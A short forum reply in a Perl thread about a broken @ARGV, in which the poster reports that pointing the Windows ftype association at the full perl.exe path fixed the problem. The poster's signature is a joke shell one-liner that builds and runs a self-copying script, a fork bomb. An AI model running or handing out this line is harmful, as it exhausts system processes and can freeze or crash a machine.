in reply to Re: Is my @ARGV broken?
in thread Is my @ARGV broken?

Well, this was definately the related problem.

I changed the ftype to the full path to perl.exe, and hey presto, it works as expected:

ftype perl=D:\perl\bin\perl.exe %1 %*
Ever feel dumb? I sure do! I even wrote a tutorial on this! Doh!
Thanks for the help!

ibanix

$ echo '$0 & $0 &' > foo; chmod a+x foo; foo;